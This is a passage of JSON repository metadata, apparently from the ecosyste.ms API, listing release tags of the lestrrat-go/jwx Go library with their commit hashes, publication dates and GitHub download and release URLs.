os.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.12/manifests"},{"name":"v2.0.11","sha":"6c41e3822485fc7e11dd70b4b0524b075d66b103","kind":"commit","published_at":"2023-06-14T08:15:57.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.11","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.11/manifests"},{"name":"v1.2.26","sha":"d9ddbc8e5009cfdd8c28413390b67afa7f576dd6","kind":"commit","published_at":"2023-06-14T08:09:12.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.26","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.26","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.26","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.26","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.26/manifests"},{"name":"v2.0.10","sha":"8840ffd4afc5839f591ff0e9ba9034af52b1643e","kind":"commit","published_at":"2023-06-12T07:24:20.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.10","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.10/manifests"},{"name":"v2.0.9","sha":"fccc52457a90ce00d625c3ed8d5d3443e903a91b","kind":"commit","published_at":"2023-03-21T03:29:06.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.9","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.9/manifests"},{"name":"v2.0.8","sha":"7803b82f35c80ed24b6d8b730a11983f751904b8","kind":"commit","published_at":"2022-11-25T00:58:35.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.8","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.8/manifests"},{"name":"v2.0.7","sha":"6e8e91832b11d1d13f53b5e0b9a49fcd10db1f27","kind":"commit","published_at":"2022-11-15T01:54:59.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.7","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.7/manifests"},{"name":"v2.0.6","sha":"92950642291a3af54c5f1455ec68e76b390587ae","kind":"commit","published_at":"2022-08-25T13:19:48.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.6","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.6/manifests"},{"name":"v2.0.5","sha":"c599c15c345121b1223fb7a744eaa07fdfe5e95e","kind":"commit","published_at":"2022-08-11T00:18:55.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.5","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.5/manifests"},{"name":"v2.0.4","sha":"21f292826bf5f4cb76be98dcdfef9ce635835b5e","kind":"commit","published_at":"2022-07-19T05:24:38.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.4","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.4/manifests"},{"name":"v2.0.3","sha":"650fe90d166ba9ada98474be3b9f6450701ffb71","kind":"commit","published_at":"2022-06-13T12:26:04.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.3","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.3/manifests"},{"name":"v2.0.2","sha":"dc603b6e88971ce0c477c48fd8b77e84ffefb169","kind":"commit","published_at":"2022-05-23T12:58:39.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.2","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.2/manifests"},{"name":"v1.2.25","sha":"ad8c29d1628435cdad008b5cbbfbe75f5bfc74ae","kind":"commit","published_at":"2022-05-23T12:48:33.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.25","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.25","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.25","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.25","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.25/manifests"},{"name":"v2.0.1","sha":"0d365e4523faae8e9f3bbcbd5bc3a09cab951d49","kind":"commit","published_at":"2022-05-06T00:39:15.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.1","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.1/manifests"},{"name":"v1.2.24","sha":"e38f677839edbeae5480e993d73eacb94f7af581","kind":"commit","published_at":"2022-05-05T01:00:31.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.24","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.24","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.24","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.24","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.24/manifests"},{"name":"v2.0.0","sha":"8f97f606570bc3de90005ce3188824e7e7eff88a","kind":"commit","published_at":"2022-04-24T04:18:24.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.0","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.0/manifests"},{"name":"v2.0.0-beta2","sha":"fd8fafc9fe0a7310d9dec456168a452d571c16b0","kind":"commit","published_at":"2022-04-16T06:50:40.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.0-beta2","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.0-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.0-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.0-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.0-beta2/manifests"},{"name":"v1.2.23","sha":"baba5610e7fb53402e23c955edc10dbb25d73275","kind":"commit","published_at":"2022-04-13T09:52:34.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.23","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.23","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.23","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.23","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.23/manifests"},{"name":"v2.0.0-beta1","sha":"0258045345942aed8b8694da94cfb5ab4dd3261c","kind":"commit","published_at":"2022-04-09T13:16:46.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.0-beta1","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.0-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.0-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.0-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.0-beta1/manifests"},{"name":"v1.2.22","sha":"f4701e19d38b7fd1ede0ef785867e078016b516e","kind":"commit","published_at":"2022-04-08T11:18:28.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.22","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.22","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.22","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.22","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.22/manifests"},{"name":"v2.0.0-alpha1","sha":"8a69aa2dd6b9a7a8284584cdd23acd96613c0866","kind":"commit","published_at":"2022-04-03T23:49:46.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.0-alpha1","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.0-alpha1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.0-alpha1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.0-alpha1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.0-alpha1/manifests"},{"name":"v1.2.21","sha":"7b28f4c7fabe44249b77e058e5ca33c82b599d5e","kind":"commit","published_at":"2022-03-29T22:49:40.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.21","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.21","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.21","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.21","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.21/manifests"},{"name":"v1.2.20","sha":"3fa12c9bedcebd03db23f61cfb65ae0b040bf211","kind":"commit","published_at":"2022-03-03T05:56:32.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.20","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.20","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.20","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.20","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.20/manifests"},{"name":"v1.2.19","sha":"1c0a87feccf45c59a54ee3c9f2a995ab777953e7","kind":"commit","published_at":"2022-02-22T01:40:38.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.19","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.19","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.19","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.19","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.19/manifests"},{"name":"v1.2.18","sha":"2ab72de258ac966aeec3cfb836209692ed345586","kind":"commit","published_at":"2022-01-23T00:22:42.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.18","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.18","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.18","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.18","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.18/manifests"},{"name":"v1.2.17","sha":"300b79a15b99559ba7ad22e4275ecc99a07c359b","kind":"commit","published_at":"2022-01-12T10:10:06.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.17","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.17","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.17","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.17","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.17/manifests"},{"name":"v1.2.16","sha":"9349cc843391834794d593c4daa1345de1ab357e","kind":"commit","published_at":"2022-01-12T05:29:13.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.16","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.16","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.16","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.16","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.16/manifests"},{"name":"v1.2.15","sha":"5ded25fd0bf8f759a96a7ae3937df829d8e4777d","kind":"commit","published_at":"2022-01-06T23:30:16.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.15","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.15/manifests"},{"name":"v1.2.14","sha":"de7d9bca43812abc4f630320f8632108ccfe34bf","kind":"commit","published_at":"2021-12-22T01:34:54.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.14","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.14/manifests"},{"name":"v1.2.13","sha":"59f4c03c3e0aeb44f6b6a57fd96b90f9a679f880","kind":"commit","published_at":"2021-12-07T02:59:52.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.13","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.13/manifests"},{"name":"v1.2.12","sha":"45e532bbe4ada174b16f5f170ea62d2c8d83ef77","kind":"commit","published_at":"2021-12-01T06:52:40.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.12","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.12/manifests"},{"name":"v1.2.11","sha":"e371adc10f659fa05b064274ff549a8e0353d2b6","kind":"commit","published_at":"2021-11-13T15:34:01.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.11","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.11/manifests"},{"name":"v1.2.10","sha":"09a4d070eb0ec840a33597a67a17e6cddb53da87","kind":"commit","published_at":"2021-11-09T09:16:28.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.10","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.10/manifests"},{"name":"v1.2.9","sha":"b2da2238b7b342a8889470b901ef3024dfc0712a","kind":"commit","published_at":"2021-10-26T01:00:34.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.9","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.9/manifests"},{"name":"v1.2.8","sha":"f2bdd8c9df46d61fe987fa36bcc87c58ef846046","kind":"commit","published_at":"2021-10-21T01:23:06.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.8","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.8/manifests"},{"name":"v1.2.7","sha":"b9292016a6572dce779109d8da8d813b85abb658","kind":"commit","published_at":"2021-09-26T06:08:18.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.7","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.7/manifests"},{"name":"v1.2.6","sha":"41b30b67e905482292496e528119fc7482482ab3","kind":"commit","published_at":"2021-08-24T07:56:45.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.6","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.6/manifests"},{"name":"v1.2.5","sha":"551083cda79fd07493bf0db6e825278dd88c1fc3","kind":"commit","published_at":"2021-08-04T12:17:57.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.5","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.5/manifests"},{"name":"v1.2.4","sha":"d01528f5e5ae3221a48f67570928867e98184bbd","kind":"commit","published_at":"2021-07-15T13:26:23.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.4","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.4/manifests"},{"name":"v1.2.3","sha":"5e2de6ea11b5112bdf1a5e088d56c9c2e7fb6807","kind":"commit","published_at":"2021-07-15T09:53:13.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.3","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.3/manifests"},{"name":"v1.2.2","sha":"7159c501c5a43f8788f3a9a0961e146480c28eae","kind":"commit","published_at":"2021-07-12T23:38:00.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.2","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.2/manifests"},{"name":"v1.2.1","sha":"08de34253bc9633a11b019b143a2d212f8ff0ed8","kind":"commit","published_at":"2021-06-01T23:24:46.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.1","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.1/manifests"},{"name":"v1.2.0","sha":"20fcd2aaea33121a0da375914a254615b3527c46","kind":"commit","published_at":"2021-04-29T23:40:49.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.0","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.0/manifests"},{"name":"v1.1.8-rc1","sha":"4fc7156e9562e4b51143220e830ed2d32279d2f6","kind":"commit","published_at":"2021-04-08T12:05:34.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.1.8-rc1","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.1.8-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.1.8-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.8-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.8-rc1/manifests"},{"name":"v1.1.7","sha":"db72eadbbe21fa7dc37d5628acfaa803fbf7d96e","kind":"commit","published_at":"2021-04-02T13:09:54.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.1.7","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.7/manifests"},{"name":"v1.1.7-rc1","sha":"afd2d647f5892a70ab72ee14e9985ab5028bfb23","kind":"commit","published_at":"2021-03-31T06:49:4